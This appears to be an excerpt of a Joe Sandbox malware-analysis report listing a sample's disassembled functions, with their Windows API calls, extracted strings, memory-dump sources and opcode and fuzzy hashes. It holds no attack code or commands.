                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0066BA9D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0066BAA6
                                                      • CloseHandle.KERNEL32(00000000), ref: 0066BAAD
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0066BABE
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00672CAC,?), ref: 0066BAD7
                                                      • GlobalFree.KERNEL32(00000000), ref: 0066BAE7
                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0066BB0B
                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0066BB36
                                                      • DeleteObject.GDI32(00000000), ref: 0066BB5E
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0066BB74
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID: @U=u
                                                      • API String ID: 3840717409-2594219639
                                                      • Opcode ID: b4df085a47a1049bc7a0c50cd466a8cf38f5a635c6aaf2470bdc447c6a04fee8
                                                      • Instruction ID: ccff60ff66f06e239624fce5c60f7260d9fe3c2c98f5ccc55448aac113030258
                                                      • Opcode Fuzzy Hash: b4df085a47a1049bc7a0c50cd466a8cf38f5a635c6aaf2470bdc447c6a04fee8
                                                      • Instruction Fuzzy Hash: F2410A75600204FFDB119FA5EC88EAABBBAFF89711F105069F905D7260DB709E41DB60
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0063A47A
                                                      • __swprintf.LIBCMT ref: 0063A51B
                                                      • _wcscmp.LIBCMT ref: 0063A52E
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0063A583
                                                      • _wcscmp.LIBCMT ref: 0063A5BF
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0063A5F6
                                                      • GetDlgCtrlID.USER32(?), ref: 0063A648
                                                      • GetWindowRect.USER32(?,?), ref: 0063A67E
                                                      • GetParent.USER32(?), ref: 0063A69C
                                                      • ScreenToClient.USER32(00000000), ref: 0063A6A3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0063A71D
                                                      • _wcscmp.LIBCMT ref: 0063A731
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0063A757
                                                      • _wcscmp.LIBCMT ref: 0063A76B
                                                        • Part of subcall function 0060362C: _iswctype.LIBCMT ref: 00603634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: ffd238e8f91d31800ccdb07a7b818d3d63dc985f528d46261279e390b5ab2402
                                                      • Instruction ID: 9d60f1eb09587366b22f297e612b4452d4c17f97f0799ba4cfc1061f48cce14f
                                                      • Opcode Fuzzy Hash: ffd238e8f91d31800ccdb07a7b818d3d63dc985f528d46261279e390b5ab2402
                                                      • Instruction Fuzzy Hash: 07A1B235204606AFD719DFA4C888BEAB7EAFF44315F004629F9D9C2290DB30E955DBD2
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0063AF18
                                                      • _wcscmp.LIBCMT ref: 0063AF29
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0063AF51
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0063AF6E
                                                      • _wcscmp.LIBCMT ref: 0063AF8C
                                                      • _wcsstr.LIBCMT ref: 0063AF9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0063AFD5
                                                      • _wcscmp.LIBCMT ref: 0063AFE5
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0063B00C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0063B055
                                                      • _wcscmp.LIBCMT ref: 0063B065
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0063B08D
                                                      • GetWindowRect.USER32(00000004,?), ref: 0063B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: f323ec4cfe511a97bfea9a5aff8f9f8d708633589980b309ca99872b90e6b545
                                                      • Instruction ID: e707b0adb24f519d1abbab59da13261a5efcb364888b884ef054f879f9d4ff7a
                                                      • Opcode Fuzzy Hash: f323ec4cfe511a97bfea9a5aff8f9f8d708633589980b309ca99872b90e6b545
                                                      • Instruction Fuzzy Hash: 0981A1711082059BDB05DF10C885FAA7BEAFF84314F04946EFE858A1A1DB74DD45CBE2
                                                      APIs
                                                      • _memset.LIBCMT ref: 0066A259
                                                      • DestroyWindow.USER32(?,?), ref: 0066A2D3
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0066A34D
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0066A36F
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066A382
                                                      • DestroyWindow.USER32(00000000), ref: 0066A3A4
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005E0000,00000000), ref: 0066A3DB
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066A3F4
                                                      • GetDesktopWindow.USER32 ref: 0066A40D
                                                      • GetWindowRect.USER32(00000000), ref: 0066A414
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066A42C
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0066A444
                                                        • Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$@U=u$tooltips_class32
                                                      • API String ID: 1297703922-1130792468
                                                      • Opcode ID: cb46df8763518f32d2c17b6e589df954e2ca3a71b662e86f66b6aceb9a093d71
                                                      • Instruction ID: 904e926d304a39fd14f0d1e5aa98207f17d8dc968bd89c0ba976c42fb96f3d15
                                                      • Opcode Fuzzy Hash: cb46df8763518f32d2c17b6e589df954e2ca3a71b662e86f66b6aceb9a093d71
                                                      • Instruction Fuzzy Hash: 86718A70140205AFD725DF68CC48FAA7BEAFB89700F04451DF986A72A1DBB5A902CF52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: b3feb2d8d3df09c5ed4344f3c07b395845a5b4553546a878c0a897a53a25de38
                                                      • Instruction ID: 9b3aa37d7402b804b6847e61110bb43884f66ef442596dd3faff8e6176547cbd
                                                      • Opcode Fuzzy Hash: b3feb2d8d3df09c5ed4344f3c07b395845a5b4553546a878c0a897a53a25de38
                                                      • Instruction Fuzzy Hash: D131A33198820AA6DE18FB91DE07EEF7B6AAF10711F200419F482715D1FF516F04D69A
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00655013
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0065501E
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00655029
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00655034
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0065503F
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0065504A
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00655055
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00655060
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0065506B
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00655076
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00655081
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0065508C
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00655097
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 006550A2
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 006550AD
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 006550B8
                                                      • GetCursorInfo.USER32(?), ref: 006550C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: 464e23b3c41df95d50ab2e59966a581d4286353d545383a7866a6a2c4125a077
                                                      • Instruction ID: 8ca6f6e70c49a987f060de85f96bdf81d06b35eb79c649acb9589da5d985d64c
                                                      • Opcode Fuzzy Hash: 464e23b3c41df95d50ab2e59966a581d4286353d545383a7866a6a2c4125a077
                                                      • Instruction Fuzzy Hash: 543115B1D0831A6ADF109FB68C899AFBFE9FF04750F50452AE50DE7280DA78A5058F91
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00664424
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0066446F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-383632319
                                                      • Opcode ID: 7f51cf0b5cea86e37a9928d55fdc5d42678fd9ea74f0be5245ba99606751630a
                                                      • Instruction ID: 2d545cf89eba0058954e2951cca64c13d6d6771a4081e3c331da3e8cbacca02e
                                                      • Opcode Fuzzy Hash: 7f51cf0b5cea86e37a9928d55fdc5d42678fd9ea74f0be5245ba99606751630a
                                                      • Instruction Fuzzy Hash: 68915A702043419FCB08EF20C455A6EBBE6AF95350F04886CF8965B7A2DF31ED4ACB95
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0066B8B4
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00666B11,?), ref: 0066B910
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066B949
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0066B98C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066B9C3
                                                      • FreeLibrary.KERNEL32(?), ref: 0066B9CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066B9DF
                                                      • DestroyIcon.USER32(?), ref: 0066B9EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066BA0B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0066BA17
                                                        • Part of subcall function 00602EFD: __wcsicmp_l.LIBCMT ref: 00602F86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl$@U=u
                                                      • API String ID: 1212759294-1639919054
                                                      • Opcode ID: 2b5df017507963280a117f0e1c5c415146272db5100320992aa86ebd4a15a7a7
                                                      • Instruction ID: 13790056465b684fd67cfccac0664c5313c0cbb49801fcfb7735691155e84a70
                                                      • Opcode Fuzzy Hash: 2b5df017507963280a117f0e1c5c415146272db5100320992aa86ebd4a15a7a7
                                                      • Instruction Fuzzy Hash: DD61ED71980209FAEB18DF64DC45BBE7BAEFF09710F10421AFA11D61D0DBB49981DBA0
                                                      APIs
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0064A3CB
                                                      • GetDriveTypeW.KERNEL32 ref: 0064A418
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A460
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A497
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A4C5
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: bfc11dffdb42a18c68bcc0382da744635b0602998b31c00c568ad0c5c4fd1b78
                                                      • Instruction ID: 43aab25d2887a2db1a35eeb5059480ccb3d8ca4cdedce7f0a7fa3ecae3f9daec
                                                      • Opcode Fuzzy Hash: bfc11dffdb42a18c68bcc0382da744635b0602998b31c00c568ad0c5c4fd1b78
                                                      • Instruction Fuzzy Hash: 2E516E711083469FC704EF11C88596EBBE9FF99718F10486DF88A97261DB31EE0ACB42
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0061E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0063F8DF
                                                      • LoadStringW.USER32(00000000,?,0061E029,00000001), ref: 0063F8E8
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0061E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0063F90A
                                                      • LoadStringW.USER32(00000000,?,0061E029,00000001), ref: 0063F90D
                                                      • __swprintf.LIBCMT ref: 0063F95D
                                                      • __swprintf.LIBCMT ref: 0063F96E
                                                      • _wprintf.LIBCMT ref: 0063FA17
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063FA2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 355c981ee8903d8afc188eb4feebd5f6cd82a777a1f94dd6f2fe53ce5b827ff5
                                                      • Instruction ID: dd54f7d7265666fcabf40e3aadb830cbd7ac11382c96c41bb0d80e301f314714
                                                      • Opcode Fuzzy Hash: 355c981ee8903d8afc188eb4feebd5f6cd82a777a1f94dd6f2fe53ce5b827ff5
                                                      • Instruction Fuzzy Hash: 1A411D72C0415EAACF08FFE1DD4AEEE7B7DAF59340F100065B505A6192EA316F49CBA1
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0064DA10
                                                      • _wcscat.LIBCMT ref: 0064DA28
                                                      • _wcscat.LIBCMT ref: 0064DA3A
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064DA4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0064DA63
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0064DA7B
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0064DA95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0064DAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 41fb61d638a812d6b147bd6feab1692591eab2166151961d4ab2d90eb13d67c1
                                                      • Instruction ID: 5312961d4e01e4673da8de2684c2d2e00cd503514d0cf5f19e322b3b1d8b0c37
                                                      • Opcode Fuzzy Hash: 41fb61d638a812d6b147bd6feab1692591eab2166151961d4ab2d90eb13d67c1
                                                      • Instruction Fuzzy Hash: 008182719083419FCB64EF65C844AAAB7EABF89314F18482EF889C7351E730DD45CB52
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0066C1FC
                                                      • GetFocus.USER32 ref: 0066C20C
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0066C217
                                                      • _memset.LIBCMT ref: 0066C342
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0066C36D
                                                      • GetMenuItemCount.USER32(?), ref: 0066C38D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0066C3A0
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0066C3D4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0066C41C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0066C454
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0066C489
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 6424314f6d53ee1a653d10914899f86a8aff3f90c0567b687f1dc1bbc0f1c366
                                                      • Instruction ID: 91adb7918226bdf4ddc678fc08f8e280b067e33a38b2d67480d3c84a63c44e25
                                                      • Opcode Fuzzy Hash: 6424314f6d53ee1a653d10914899f86a8aff3f90c0567b687f1dc1bbc0f1c366
                                                      • Instruction Fuzzy Hash: C0818C70209711AFD710DF15D894ABBBBEAFB88724F00492EF99597391CB70D901CBA2
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0065738F
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0065739B
                                                      • CreateCompatibleDC.GDI32(?), ref: 006573A7
                                                      • SelectObject.GDI32(00000000,?), ref: 006573B4
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00657408
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00657444
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00657468
                                                      • SelectObject.GDI32(00000006,?), ref: 00657470
                                                      • DeleteObject.GDI32(?), ref: 00657479
                                                      • DeleteDC.GDI32(00000006), ref: 00657480
                                                      • ReleaseDC.USER32(00000000,?), ref: 0065748B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: fd611997d920a50a6fd3e7f094c8e2666d6b5741616d802ed55a7d1a020d2ba5
                                                      • Instruction ID: 066fe6c573e9e92bdcc6ba2d76a07456521f1ebfd34eb81b97ff0878e16a114a
                                                      • Opcode Fuzzy Hash: fd611997d920a50a6fd3e7f094c8e2666d6b5741616d802ed55a7d1a020d2ba5
